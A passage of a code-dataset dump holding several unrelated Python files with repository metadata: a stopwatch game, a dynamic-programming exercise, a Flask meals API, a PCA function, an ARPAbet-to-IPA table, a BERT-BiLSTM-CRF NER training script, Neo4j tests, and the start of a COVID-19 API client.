exts:\n # Use glob to search for files with the current extension\n files = glob.glob(os.path.join(image_folder,'*' + ext))\n # Extend the matching_files list with the found file paths\n image_paths.extend(files)\n\n return image_paths","repo_name":"regs08/my_SAM","sub_path":"utils/loading_utils.py","file_name":"loading_utils.py","file_ext":"py","file_size_in_byte":2512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12450856279","text":"# http://www.codeskulptor.org/#user21_4vsRqDxBUR6cYHq.py\n\n# template for \"Stopwatch: The Game\"\nimport simplegui\n\n# define global variables\ntime = 0\nsuccessful_stop = 0\ntotal_stop = 0\n\n# define helper function format that converts time\n# in tenths of seconds into formatted string A:BC.D\ndef format(t):\n minute = t // 600\n second = (t % 600) // 10\n tenth_second = t % 10\n if second < 10:\n str_second = \"0\" + str(second)\n else:\n str_second = str(second)\n return str(minute) + \":\" + str_second + \".\" + str(tenth_second)\n \n# define event handlers for buttons; \"Start\", \"Stop\", \"Reset\"\ndef start():\n timer.start()\n \ndef stop():\n global total_stop, successful_stop\n if timer.is_running():\n total_stop = total_stop + 1\n timer.stop()\n if time % 10 == 0:\n successful_stop = successful_stop + 1\n \ndef reset():\n global time, successful_stop, total_stop\n time = 0\n successful_stop = 0\n total_stop = 0\n\n# define event handler for timer with 0.1 sec interval\ndef timer_handler():\n global time\n time = time + 1\n\n# define draw handler\ndef draw_handler(canvas):\n canvas.draw_text(format(time), [100, 100], 40, \"red\")\n canvas.draw_text(str(successful_stop) + \"/\" + str(total_stop), \n [250, 40], 20, \"red\")\n \n# create frame\nframe = simplegui.create_frame(\"Stop Watch\", 300, 200)\ntimer = simplegui.create_timer(100, timer_handler)\n\n# register event handlers\nstart_button = frame.add_button(\"Start\", start, 200)\nstop_button = frame.add_button(\"Stop\", stop, 200)\nreset_button = frame.add_button(\"Reset\", reset, 200)\nframe.set_draw_handler(draw_handler)\n\n# start frame\nframe.start()","repo_name":"aglove2189/Coursera-IntPy","sub_path":"003-Stopwatch.py","file_name":"003-Stopwatch.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"72146763568","text":"def main():\n # 오른쪽 위 / 중간 / 아래\n dy = (1, 0, -1) \n for _ in range(int(input())):\n n, m = list(map(int,input().split()))\n gold_nums = list(map(int,input().split()))\n s, e = 0, 0\n gold = []\n for i in range(n):\n s = e\n e = m * (i + 1)\n gold.append(gold_nums[s:e])\n\n dp = [[0 for _ in range(m)] for _ in range(n)]\n for i in range(len(gold)):\n dp[i][0] = gold[i][0]\n\n \n for x in range(1, m):\n for y in range(n):\n for i in range(3):\n py = y + dy[i]\n px = x - 1\n if py < 0 or py>=n:\n continue\n\n dp[y][x] = max(dp[y][x], dp[py][px] + gold[y][x])\n\n answer = 0\n for i in range(n):\n if answer < dp[i][m-1]:\n answer = dp[i][m-1]\n \n print(answer)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"Gnu-Kenny/Like-Python","sub_path":"Algorithm/이코테/DP/금광.py","file_name":"금광.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"12239505671","text":"import time as t\n\nyear = int(input('请输入年:'))\nmonth = int(input('请输入月:'))\nday = int(input('请输入日:'))\n\n# 获得出生时间元组:\nbirthday_tuple = (year,month,day,0,0,0,0,0,0)\n\n# 获得出生时的秒数:\nbirthday_second = t.mktime(birthday_tuple)\n\n# 获得当前时间的秒数:\ncur_second = t.time()\n\n# 计算出生到现在的天数:\nseconds = (cur_second-birthday_second)\nminutes = seconds / 60\nhours = minutes / 60\ndays = hours / 24\nmonths = days / 30\nyears = days / 365\nprint(seconds,minutes,hours,days,months,years,sep='\\n')\n\n# 计算出生时的详细信息:\n# 转回到时间本地元组:\ntime_info = t.localtime(birthday_second)\nweekday = {0:'一',1:'二',2:'三',3:'四',4:'五',5:'六',6:'日'} \nprint('你出生的那天是:星期',weekday[time_info[6]])","repo_name":"LzWaiting/00.pythonbase","sub_path":"code/module/time_module.py","file_name":"time_module.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"27150243100","text":"from flask_restx import Api,Resource,marshal,fields\nfrom flask import Blueprint,jsonify,request\nfrom .models import Meal\nfrom .exts import db\n\n\napi_bp=Blueprint('api',__name__)\n\napi=Api(api_bp)\n\n#serialization model\n\nmodel=api.model(\n 'Meal',\n {\n \"id\":fields.Integer(),\n \"name\":fields.String(),\n \"price\":fields.Integer(),\n \"description\":fields.String()\n })\n\n@api.route('/meals')\nclass MealResource(Resource):\n #get all meals\n def get(self):\n meals=Meal.get_meals_descending()\n\n return marshal(meals,fields=model,envelope=\"meals\")\n #create a new meal resource\n def post(self):\n data=request.get_json()\n\n new_meal=Meal(name=data.get('name'),price=data.get('price'),description=data.get('description'))\n\n new_meal.save()\n\n return marshal(new_meal,fields=model,envelope=\"meal\")\n\n\n@api.route('/meal/')\nclass MealResourceID(Resource):\n #get a resource by id\n def get(self,id):\n meal=Meal.get_by_id(id)\n\n return marshal(meal,fields=model,envelope=\"meal\")\n #update a resource by id\n def put(self,id):\n meal=Meal.get_by_id(id)\n\n data=request.get_json()\n\n meal.name=data.get('name')\n\n meal.price=data.get('price')\n\n meal.description=data.get('description')\n\n db.session.commit()\n\n return marshal(meal,fields=model,envelope=\"meal\")\n # delete a resource by its id\n def delete(self,id):\n meal=Meal.get_by_id(id)\n meal.delete()\n return marshal(meal,fields=model,envelope=\"meal\")\n\n\n\n\n","repo_name":"jod35/meals","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73986963566","text":"from sklearn.metrics import confusion_matrix\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom tensorflow import keras\r\nfrom keras import layers\r\nimport matplotlib.pyplot as plt\r\nfrom keras.utils.np_utils import to_categorical\r\nimport importlib\r\nimport config\r\nimport os\r\nfrom numpy.random import seed\r\nimport tensorflow as tf\r\nimport getData\r\nfrom keras.callbacks import LearningRateScheduler\r\nimport seaborn as sns\r\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\r\nfrom sklearn.preprocessing import LabelEncoder\r\n\r\nseed(30)\r\ntf.random.set_seed(20)\r\n\r\n# variables need to change for each training\r\ntest_ratio = 0.3 # test size\r\nNw = 3 # number of classes\r\nfilt = 32 # filters\r\nk_size = 3 # kernel_size\r\nepoch = 50\r\nbatch_size = 64\r\nmodel_name = \"lab1500\"\r\ntraining = True # set to train or calculate validation confusion matrix\r\n\r\ndecoder = importlib.import_module(f'decoders.{config.decoder}') # This is also an import\r\n\r\ndirectories = ['pcapfiles/down','pcapfiles/left', 'pcapfiles/right']\r\n# directories = ['pcapfiles/lab700/down', 'pcapfiles/lab700/left', 'pcapfiles/lab700/name', 'pcapfiles/lab700/right',\r\n# 'pcapfiles/lab700/stop']\r\n#\r\n# directories = ['pcapfiles/home/five', 'pcapfiles/home/fixed', 'pcapfiles/home/one', 'pcapfiles/home/ok',\r\n# 'pcapfiles/home/wave']\r\ncsi, label = getData.get_data(directories)\r\nprint(csi.shape)\r\n# number of classes\r\ncsi_train, csi_test, label_train, label_test = train_test_split(csi, label, test_size=test_ratio, random_state=5)\r\n\r\nif training:\r\n label_train = to_categorical(label_train, Nw)\r\n label_test = to_categorical(label_test, Nw)\r\n [T, M, N, S] = csi.shape\r\n model = keras.Sequential([\r\n keras.Input(shape=(M,N,S)),\r\n layers.Conv2D(filters=filt,kernel_size=k_size,padding=\"valid\"),\r\n layers.BatchNormalization(),\r\n layers.Activation(\"relu\"),\r\n layers.MaxPooling2D(pool_size=(3,3),strides=(3,3)),\r\n layers.Conv2D(filters=32, kernel_size=(3, 3), padding=\"valid\"),\r\n layers.BatchNormalization(),\r\n layers.Activation(\"relu\"),\r\n layers.MaxPooling2D(pool_size=(3, 3), strides=(3, 3)),\r\n layers.Flatten(),\r\n layers.Dense(Nw, activation=\"softmax\")\r\n ])\r\n\r\n\r\n # reduce lr when epoch increases\r\n def lr_scheduler(epoch, lr):\r\n if epoch < 10:\r\n return lr\r\n elif 10 <= epoch < 30:\r\n return 0.001\r\n else:\r\n return 0.0001\r\n\r\n\r\n opt = keras.optimizers.SGD(learning_rate=0.01, momentum=0.9)\r\n model.compile(loss=\"categorical_crossentropy\",\r\n optimizer=opt,\r\n metrics=[\"accuracy\"])\r\n\r\n lr_callback = LearningRateScheduler(lr_scheduler)\r\n\r\n history = model.fit(\r\n csi_train, label_train,\r\n epochs=epoch,\r\n batch_size= batch_size,\r\n validation_data=(csi_test, label_test),\r\n callbacks=[lr_callback]\r\n )\r\n\r\n model.save(model_name)\r\n accuracy = history.history[\"accuracy\"]\r\n val_accuracy = history.history[\"val_accuracy\"]\r\n loss = history.history[\"loss\"]\r\n val_loss = history.history[\"val_loss\"]\r\n epochs = range(1, len(accuracy) + 1)\r\n plt.plot(epochs, accuracy, \"r\", label=\"Training accuracy\")\r\n plt.scatter(epochs, accuracy, c='r', marker='x')\r\n plt.plot(epochs, val_accuracy, \"b\", label=\"Validation accuracy\")\r\n plt.scatter(epochs, val_accuracy, c='b', marker='x')\r\n plt.title(\"Training and validation accuracy\")\r\n plt.legend()\r\n plt.figure()\r\n plt.plot(epochs, loss, \"r\", label=\"Training loss\")\r\n plt.scatter(epochs, loss, c='r', marker='x')\r\n plt.plot(epochs, val_loss, \"b\", label=\"Validation loss\")\r\n plt.scatter(epochs, val_loss, c='b', marker='x')\r\n plt.title(\"Training and validation loss\")\r\n plt.legend()\r\n plt.show()\r\n\r\n# validation confusion matrix\r\nelse:\r\n model = keras.models.load_model(model_name)\r\n y_pred = np.argmax(model.predict(csi_test), axis=-1)\r\n cm = confusion_matrix(label_test, y_pred)\r\n sns.heatmap(cm, annot=True, cmap='Blues', fmt='g')\r\n plt.xlabel('Predicted')\r\n plt.ylabel('True')\r\n plt.show()\r\n","repo_name":"Z-Yannn/FYP-Gesture-Recognition-Using-Deep-Learning-and-Wi-Fi","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"73614032366","text":"#!/usr/bin/env python36\n# -*- coding: utf-8 -*-\n\nfrom collections import deque\n\n\ndef search(lines, pattern, history=5):\n previous_line = deque(maxlen=history)\n for line in lines:\n if pattern in line:\n yield line, previous_line\n previous_line.append(line)\n\n\nif __name__ == '__main__':\n with open(r'readme.md') as f:\n for line, previous_line in search(f, 'python', 5):\n for pline in previous_line:\n print(pline, end='')\n print(line, end='')\n print('-' * 20)\n\n","repo_name":"cutecat0/ArtsofData","sub_path":"data_science/python_part_basic/cookbook_practice/data_struct_algorithm/03_keep_last_n_elements.py","file_name":"03_keep_last_n_elements.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"5450128595","text":"import numpy as np\n\ndef pca(X, k): # k自己设置(降维后的维度)\n # 各特征的平均值\n n_samples, n_features = X.shape\n mean = np.array([np.mean(X[:, i]) for i in range(n_features)])\n # 标准化\n norm_X = X - mean\n # 求出协方差\n scatter_matrix = np.dot(np.transpose(norm_X), norm_X)\n # 计算特征向量和特征值\n eig_val, eig_vec = np.linalg.eig(scatter_matrix)\n eig_pairs = [(np.abs(eig_val[i]), eig_vec[:, i]) for i in range(n_features)]\n # 特征值从高到低排序\n eig_pairs.sort(reverse=True)\n # 按照K值排列特征向量数量\n feature = np.array([ele[1] for ele in eig_pairs[:k]])\n # 得到降维后的矩阵\n data = np.dot(norm_X, np.transpose(feature))\n return data\n\nif __name__ == '__main__':\n X = np.array([[-1, 1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])\n\n print(pca(X, 1))","repo_name":"AI-Bai/algorithm","sub_path":"PCA/白建宝/PCA/get_pca.py","file_name":"get_pca.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"71396771886","text":"# Based on : https://github.com/jhasegaw/phonecodes/blob/master/src/phonecode_tables.py\narpabet2aline_dict = {\n 'AA':'ɑ',\n 'AE':'æ',\n 'AH':'ʌ',\n 'AH0':'ə',\n 'AO':'ɔ',\n 'AW':'aʊ',\n 'AY':'aɪ',\n 'EH':'ɛ',\n 'ER':'ɝ',\n 'EY':'eɪ',\n 'IH':'ɪ',\n 'IH0':'ɨ',\n 'IY':'i',\n 'OW':'oʊ',\n 'OY':'ɔɪ',\n 'UH':'ʊ',\n 'UW':'u',\n 'B':'b',\n 'CH':'tʃ',\n 'D':'d',\n 'DH':'ð',\n# 'EL':'l̩ ', # Unused by cmudict ((syllabic)\n# 'EM':'m̩',# Unused by cmudict (syllabic)̩\n# 'EN':'n̩', # Unused by cmudict (syllabic)\n 'F':'f',\n 'G':'g',\n 'HH':'h',\n 'JH':'dʒ',\n 'K':'k',\n 'L':'l',\n 'M':'m',\n 'N':'n',\n 'NG':'ŋ',\n 'P':'p',\n 'Q':'ʔ',\n 'R':'ɹ',\n 'S':'s',\n 'SH':'ʃ',\n 'T':'t',\n 'TH':'θ',\n 'V':'v',\n 'W':'w',\n# 'WH':'ʍ', # Unused by cmudict\n 'Y':'j',\n 'Z':'z',\n 'ZH':'ʒ'\n}\n'''Converts list of arpabet phonemes to aline IPA phonemes'''\ndef arpa2aline(arpa_phonemes):\n aline_phonemes = []\n for arpa in arpa_phonemes:\n if arpa not in arpabet2aline_dict:\n raise Exception(arpa + ' not found in list of known arpabet\\\n phonemes')\n aline_phonemes.append(arpabet2aline_dict[arpa])\n return aline_phonemes\n","repo_name":"DanielLoney/auto-rap-highlighter","sub_path":"src/aline/arpa2aline.py","file_name":"arpa2aline.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"43703895061","text":"from bert.bert import modeling, optimization, tokenization\nimport tensorflow as tf\nfrom blstm_crf.model.lstm_crf_layer import BLSTM_CRF\nfrom blstm_crf.utils import tf_metrics\nfrom tensorflow.contrib.layers.python.layers import initializers\nfrom blstm_crf.utils.data_processor import NerProcessor\nimport os\nimport json\nimport codecs\nfrom blstm_crf.utils.util import file_based_input_fn_builder, filed_based_convert_examples_to_features\nimport logging\nimport pickle\nfrom blstm_crf.utils.conlleval import return_report\nimport traceback\n\n\nconfig_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config')\nparams_path = os.path.join(config_path, 'params.json')\nlog_path = os.path.join(os.path.dirname(os.path.dirname(os.path.realpath(__file__))), 'log.txt')\nlogging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n filename=log_path)\nlogger = logging.getLogger(__name__)\n\ndef create_model(bert_config, is_training, input_ids, input_mask,\n segment_ids, labels, num_labels, use_one_hot_embeddings, params):\n model = modeling.BertModel(config=bert_config,\n is_training=is_training,\n input_ids=input_ids,\n input_mask=input_mask,\n token_type_ids=segment_ids,\n use_one_hot_embeddings=use_one_hot_embeddings)\n embedding = model.get_sequence_output()\n max_seq_length = embedding.shape[1].value\n\n used = tf.sign(tf.abs(input_ids))\n lengths = tf.reduce_sum(used, reduction_indices=1)\n\n blstm_crf = BLSTM_CRF(embedded_chars=embedding, hidden_unit=params.lstm_size, cell_type=params.cell,\n num_layers=params.num_layers,\n droupout_rate=params.dropout_rate, initializers=initializers, num_labels=num_labels,\n seq_length=max_seq_length, labels=labels, lengths=lengths, is_training=is_training)\n rst = blstm_crf.add_blstm_crf_layer()\n return rst\n\n\ndef model_fn_builder(bert_config, num_labels, init_checkpoint, learning_rate,\n num_train_steps, num_warmup_steps,\n use_one_hot_embeddings, out_params):\n \"\"\"\n 构建模型\n :param bert_config:\n :param num_labels:\n :param init_checkpoint:\n :param learning_rate:\n :param num_train_steps:\n :param num_warmup_steps:\n :param use_tpu:\n :param use_one_hot_embeddings:\n :return:\n \"\"\"\n\n def model_fn(features, labels, mode, params):\n tf.logging.info(\"*** Features ***\")\n for name in sorted(features.keys()):\n tf.logging.info(\" name = %s, shape = %s\" % (name, features[name].shape))\n input_ids = features[\"input_ids\"]\n input_mask = features[\"input_mask\"]\n segment_ids = features[\"segment_ids\"]\n label_ids = features[\"label_ids\"]\n\n print('shape of input_ids', input_ids.shape)\n # label_mask = features[\"label_mask\"]\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n # 使用参数构建模型,input_idx 就是输入的样本idx表示,label_ids 就是标签的idx表示\n (total_loss, logits, trans, pred_ids) = create_model(\n bert_config, is_training, input_ids, input_mask, segment_ids, label_ids,\n num_labels, use_one_hot_embeddings, out_params)\n\n tvars = tf.trainable_variables()\n # 加载BERT模型\n if init_checkpoint:\n (assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,\n init_checkpoint)\n tf.train.init_from_checkpoint(init_checkpoint, assignment_map)\n\n tf.logging.info(\"**** Trainable Variables ****\")\n\n # 打印加载模型的参数\n # for var in tvars:\n # init_string = \"\"\n # if var.name in initialized_variable_names:\n # init_string = \", *INIT_FROM_CKPT*\"\n # tf.logging.info(\" name = %s, shape = %s%s\", var.name, var.shape,\n # init_string)\n output_spec = None\n if mode == tf.estimator.ModeKeys.TRAIN:\n train_op = optimization.create_optimizer(\n total_loss, learning_rate, num_train_steps, num_warmup_steps, None)\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n train_op=train_op) # 钩子,这里用来将BERT中的参数作为我们模型的初始值\n elif mode == tf.estimator.ModeKeys.EVAL:\n # 针对NER ,进行了修改\n def metric_fn(label_ids, logits, trans):\n # 首先对结果进行维特比解码\n # crf 解码\n\n weight = tf.sequence_mask(out_params.max_seq_length)\n precision = tf_metrics.precision(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n recall = tf_metrics.recall(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n f = tf_metrics.f1(label_ids, pred_ids, num_labels, [2, 3, 4, 5, 6, 7], weight)\n\n return {\n \"eval_precision\": precision,\n \"eval_recall\": recall,\n \"eval_f\": f,\n # \"eval_loss\": loss,\n }\n\n eval_metrics = metric_fn(label_ids, logits, trans)\n # eval_metrics = (metric_fn, [label_ids, logits])\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n loss=total_loss,\n eval_metric_ops=eval_metrics) #\n else:\n predictions = {\n 'pred_ids': pred_ids\n }\n export_outputs = {\n 'prediction': tf.estimator.export.PredictOutput(predictions)\n }\n output_spec = tf.estimator.EstimatorSpec(\n mode=mode,\n predictions=predictions,\n export_outputs=export_outputs\n )\n return output_spec\n\n return model_fn\n\n\ndef main(_):\n processors = {\n \"ner\": NerProcessor\n }\n logger.info(\"load param\")\n with open(params_path) as param:\n params_dict = json.load(param)\n params = tf.contrib.training.HParams(**params_dict)\n bert_path = params.bert_path\n root_path = params.root_path\n bert_config_file = os.path.join(bert_path, params.bert_config_file)\n logger.info(\"load bert config\")\n bert_config = modeling.BertConfig.from_json_file(bert_config_file)\n if params.max_seq_length >bert_config.max_position_embeddings:\n raise ValueError(\n \"Cannot use sequence length %d because the BERT model \"\n \"was only trained up to sequence length %d\" %\n (params.max_seq_length, bert_config.max_position_embeddings))\n logger.info(\"clean train's output_dir\")\n data_config_path = os.path.join(root_path, params.data_config_path)\n print(data_config_path)\n output_dir = os.path.join(root_path, params.output_dir)\n print(output_dir)\n if params.clean and params.do_train:\n if os.path.exists(output_dir):\n def del_file(path):\n ls = os.listdir(path)\n for i in ls:\n c_path = os.path.join(path, i)\n if os.path.isdir(c_path):\n del_file(c_path)\n else:\n os.remove(c_path)\n try:\n del_file(output_dir)\n except Exception as e:\n print(\"output_dir:{} \".format(output_dir) + traceback.format_exc())\n print('pleace remove the files of output dir and data.conf')\n exit(-1)\n if os.path.exists(data_config_path):\n try:\n os.remove(data_config_path)\n except Exception as e:\n print(\"data_config_path:{} \".format(data_config_path) + traceback.format_exc())\n print('pleace remove the files of output dir and data.conf')\n exit(-1)\n task_name = params.task_name.lower()\n if task_name not in processors:\n raise ValueError('Task not found: %s' % (task_name))\n\n processor = processors[task_name]()\n label_list = processor.get_labels()\n vocab_file = os.path.join(bert_path, params.vocab_file)\n tokenizer = tokenization.FullTokenizer(vocab_file=vocab_file,\n do_lower_case=params.do_lower_case)\n\n logger.info('estimator runconfig')\n run_config = tf.estimator.RunConfig(model_dir=output_dir,\n tf_random_seed=19830610,\n save_checkpoints_steps=params.save_checkpoints_steps)\n train_examples = None\n num_train_steps = None\n num_warmup_steps = None\n\n if os.path.exists(data_config_path):\n with codecs.open(data_config_path) as fd:\n data_config = json.load(fd)\n else:\n data_config = {}\n data_dir = os.path.join(root_path, params.data_dir)\n print(\"data_dir: {}\".format(data_dir))\n if params.do_train:\n logger.info(\"load train data\")\n if len(data_config) == 0:\n\n train_examples = processor.get_train_examples(data_dir)\n num_train_steps = int(\n len(train_examples) / params.train_batch_size * params.num_train_epochs)\n num_warmup_steps = int(num_train_steps * params.warmup_proportion)\n\n data_config['num_train_steps'] = num_train_steps\n data_config['num_warmup_steps'] = num_warmup_steps\n data_config['num_train_size'] = len(train_examples)\n else:\n num_train_steps = int(data_config['num_train_steps'])\n num_warmup_steps = int(data_config['num_warmup_steps'])\n init_checkpoint = os.path.join(bert_path, params.init_checkpoint)\n logger.info(\"achieve model_fn\")\n model_fn = model_fn_builder(\n bert_config=bert_config,\n num_labels=len(label_list) + 1,\n init_checkpoint=init_checkpoint,\n learning_rate=params.learning_rate,\n num_train_steps=num_train_steps,\n num_warmup_steps=num_warmup_steps,\n use_one_hot_embeddings=False,\n out_params=params\n )\n if params.do_train:\n batch_size = params.train_batch_size\n elif params.do_eval:\n batch_size = params.eval_batch_size\n else:\n batch_size = params.predict_batch_size\n estimator = tf.estimator.Estimator(\n model_fn=model_fn,\n config=run_config,\n params={'batch_size':batch_size}\n )\n if params.do_train:\n logger.info(\"convert data type to tfrecord\")\n if data_config.get('train.tf_record_path', '') == '':\n train_file = os.path.join(output_dir, \"train.tf_record\")\n filed_based_convert_examples_to_features(\n train_examples, label_list, params.max_seq_length, tokenizer, train_file, mode=None, output_dir=output_dir)\n else:\n train_file = data_config.get('train.tf_record_path')\n num_train_size = num_train_size = int(data_config['num_train_size'])\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", num_train_size)\n logger.info(\" Batch size = %d\", params.train_batch_size)\n logger.info(\" Num steps = %d\", num_train_steps)\n\n logger.info(\"read train batch data\")\n train_input_fn = file_based_input_fn_builder(\n input_file=train_file,\n seq_length=params.max_seq_length,\n is_training=True,\n drop_remainder=True)\n estimator.train(input_fn=train_input_fn, max_steps=num_train_steps)\n if params.do_eval:\n logger.info(\"achieve eval data\")\n if data_config.get('eval.tf_record_path', '') == '':\n eval_examples = processor.get_dev_examples(data_dir)\n eval_file = os.path.join(output_dir, \"eval.tf_record\")\n filed_based_convert_examples_to_features(\n eval_examples, label_list, params.max_seq_length, tokenizer, eval_file, output_dir=output_dir)\n data_config['eval.tf_record_path'] = eval_file\n data_config['num_eval_size'] = len(eval_examples)\n else:\n eval_file = data_config['eval.tf_record_path']\n num_eval_size = data_config.get('num_eval_size', 0)\n logger.info(\"***** Running evaluation *****\")\n logger.info(\" Num examples = %d\", num_eval_size)\n logger.info(\" Batch size = %d\", params.eval_batch_size)\n eval_steps = None\n eval_drop_remainder = False\n eval_input_fn = file_based_input_fn_builder(\n input_file=eval_file,\n seq_length=params.max_seq_length,\n is_training=False,\n drop_remainder=eval_drop_remainder)\n result = estimator.evaluate(input_fn=eval_input_fn, steps=eval_steps)\n output_eval_file = os.path.join(output_dir, \"eval_results.txt\")\n with codecs.open(output_eval_file, \"w\", encoding='utf-8') as writer:\n tf.logging.info(\"***** Eval results *****\")\n for key in sorted(result.keys()):\n logger.info(\" %s = %s\", key, str(result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(result[key])))\n if not os.path.exists(data_config_path):\n with codecs.open(data_config_path, 'a', encoding='utf-8') as fd:\n json.dump(data_config, fd)\n if params.do_predict:\n token_path = os.path.join(output_dir, \"token_test.txt\")\n if os.path.exists(token_path):\n os.remove(token_path)\n with codecs.open(os.path.join(output_dir, 'label2id.pkl'), 'rb') as rf:\n label2id = pickle.load(rf)\n id2label = {value: key for key, value in label2id.items()}\n predict_examples = processor.get_test_examples(data_dir)\n predict_file = os.path.join(output_dir, \"predict.tf_record\")\n filed_based_convert_examples_to_features(predict_examples, label_list,\n params.max_seq_length, tokenizer,\n predict_file, mode=\"test\",output_dir=output_dir)\n\n logger.info(\"***** Running prediction*****\")\n logger.info(\" Num examples = %d\", len(predict_examples))\n logger.info(\" Batch size = %d\", params.predict_batch_size)\n predict_drop_remainder = False\n predict_input_fn = file_based_input_fn_builder(\n input_file=predict_file,\n seq_length=params.max_seq_length,\n is_training=False,\n drop_remainder=predict_drop_remainder\n )\n\n predicted_result = estimator.evaluate(input_fn=predict_input_fn)\n output_eval_file = os.path.join(output_dir, \"predicted_results.txt\")\n with codecs.open(output_eval_file, \"w\", encoding='utf-8') as writer:\n tf.logging.info(\"***** Predict results *****\")\n for key in sorted(predicted_result.keys()):\n tf.logging.info(\" %s = %s\", key, str(predicted_result[key]))\n writer.write(\"%s = %s\\n\" % (key, str(predicted_result[key])))\n\n result = estimator.predict(input_fn=predict_input_fn)\n output_predict_file = os.path.join(output_dir, \"label_test.txt\")\n\n def result_to_pair(writer):\n for predict_line, prediction in zip(predict_examples, result):\n idx = 0\n line = ''\n line_token = str(predict_line.text).split(' ')\n label_token = str(predict_line.label).split(' ')\n if len(line_token) != len(label_token):\n tf.logging.info(predict_line.text)\n tf.logging.info(predict_line.label)\n for id in prediction:\n if id == 0:\n continue\n curr_labels = id2label[id]\n if curr_labels in ['[CLS]', '[SEP]']:\n continue\n try:\n line += line_token[idx] + ' ' + label_token[idx] + ' ' + curr_labels + '\\n'\n except Exception as e:\n tf.logging.info(e)\n tf.logging.info(predict_line.text)\n tf.logging.info(predict_line.label)\n line = ''\n break\n idx += 1\n writer.write(line + '\\n')\n\n with codecs.open(output_predict_file, 'w', encoding='utf-8') as writer:\n result_to_pair(writer)\n\n eval_result = return_report(output_predict_file)\n print(eval_result)\n\nif __name__ == '__main__':\n print(log_path)\n tf.app.run()","repo_name":"jxz542189/NER_project","sub_path":"blstm_crf/bert_blstm_crf.py","file_name":"bert_blstm_crf.py","file_ext":"py","file_size_in_byte":16811,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19527947867","text":"import unittest\nfrom src.neo4j_persistence.entry import PersistentLayer\nfrom src.neo4j_persistence import cypher_builder\nfrom src.pickler import Pickler\n\ndef str_equal_in(str, strs):\n for nstr in strs:\n if nstr == str:\n return True\n\n return False\n\n\nclass TestNeo4jMethods(unittest.TestCase):\n\n @unittest.skip\n def test_rel_insertion(self):\n user = {\"name\": \"alex\", \"id\": '3'}\n followed = [\n ('宇宙无敌大羙麗', '15443091'),\n ('宇宙无敌大羙麗2', '15443093'),\n ('宇宙无敌大羙麗3', '15443094')\n ]\n PersistentLayer.insert_followed(user, followed)\n self.assertEqual(True, True)\n\n\n @unittest.skip\n def test_review_insertion(self):\n user = {\"name\": \"alex\", \"id\": '3'}\n reviews = Pickler.load_data(\"you need to provide data file name here\")\n PersistentLayer.insert_reviews(user, reviews)\n\n\n\nclass CypherBuilderTest(unittest.TestCase):\n def test_cypher_builder_without_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.build_placeholders(person)\n self.assertTrue(str_equal_in(\"{\" + result + \"}\", [\n \"{name: {name}, id: {id}}\",\n \"{id: {id}, name: {name}}\"\n ]))\n\n\n def test_cypher_builder_with_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.build_placeholders(person, \"p\")\n self.assertTrue(str_equal_in(\"{\" + result + \"}\", [\n \"{name: {pname}, id: {pid}}\",\n \"{id: {pid}, name: {pname}}\"\n ]))\n\n\n def test_cypher_dict_prefix(self):\n person = {\"name\": \"alex\", \"id\": \"3\"}\n result = cypher_builder.prefix_dict(person, \"p\")\n self.assertEqual(result, {\"pname\": \"alex\", \"pid\": \"3\"})\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"inter-action/dianping_crawler","sub_path":"tests/neo4j_test.py","file_name":"neo4j_test.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"70895419","text":"import requests\nimport urllib.parse\nimport datetime\nimport xmltodict # 따로 설치\nimport json\n\ndef getDCDcnt():\n with open(\"secret.json\") as json_file:\n json_data = json.load(json_file)\n\n url = \"http://openapi.data.go.kr/openapi/service/rest/Covid19/getCovid19InfStateJson\"\n service_key = json_data\n\n now = datetime.datetime.now()\n today = now.strftime(\"%Y%m%d\")\n yesterday_tmp = now - datetime.timedelta(days=1)\n yesterday = yesterday_tmp.strftime(\"%Y%m%d\")\n\n queryParams = \"?\" + urllib.parse.urlencode({\n urllib.parse.quote_plus(\"serviceKey\"): urllib.parse.unquote(service_key),\n urllib.parse.quote_plus(\"pageNo\"): \"1\",\n urllib.parse.quote_plus(\"numOfRows\"): \"10\",\n urllib.parse.quote_plus(\"startCreateDt\"): 